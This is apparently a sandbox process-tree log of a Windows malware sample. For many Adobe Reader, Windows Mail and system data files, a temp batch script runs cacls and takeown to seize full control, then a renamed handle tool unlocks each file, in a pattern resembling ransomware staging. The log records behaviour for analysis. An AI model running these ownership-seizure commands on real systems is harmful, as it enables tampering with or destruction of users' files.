C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵PID:1184
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1516
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:1844
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵
- Modifies file permissions
PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif"3⤵PID:1252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "create_form.gif" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "create_form.gif" -nobanner4⤵PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1516
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif""2⤵PID:1424
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif"3⤵
- Modifies file permissions
PID:752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "info.gif" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "info.gif" -nobanner4⤵PID:1108
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:680
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:1764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:1100
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵
- Modifies file permissions
PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "trash.gif" -nobanner3⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "trash.gif" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf""2⤵PID:1108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf" /E /G Admin:F /C3⤵PID:1900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf"3⤵PID:1184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CourierStd-Bold.otf" -nobanner3⤵PID:552
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CourierStd-Bold.otf" -nobanner4⤵PID:996
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf""2⤵PID:1252
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf"3⤵
- Modifies file permissions
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MyriadPro-It.otf" -nobanner3⤵PID:1540
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MyriadPro-It.otf" -nobanner4⤵PID:1180
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:796
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:1620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "can.hyp" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "can.hyp" -nobanner4⤵PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp""2⤵PID:1644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp"3⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "usa37.hyp" -nobanner3⤵PID:848
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "usa37.hyp" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT""2⤵PID:1432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT"3⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ICELAND.TXT" -nobanner3⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ICELAND.TXT" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:1764
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:752
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui""2⤵PID:1108
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1432
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui"3⤵PID:772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1000
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:552
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui"3⤵PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:1588
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1052
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1088
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:1000
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:1108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
PID:1844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:1540
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵PID:1588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:1516
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:1564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1184
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:772
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""2⤵PID:1432
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"3⤵PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:1960
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:1000
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:1700
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:1100
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "directories.acrodata" -nobanner3⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "directories.acrodata" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe""2⤵PID:588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "vcredist_x64.exe" -nobanner3⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "vcredist_x64.exe" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1564
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1712
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui"3⤵PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:752
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:1740
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"3⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "wabmig.exe" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "wabmig.exe" -nobanner4⤵PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:300
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:1900
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:1712
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "reviewers.gif" -nobanner3⤵PID:1624
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "reviewers.gif" -nobanner4⤵PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:680
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "server_lg.gif" -nobanner3⤵PID:1844
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "server_lg.gif" -nobanner4⤵PID:1424
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
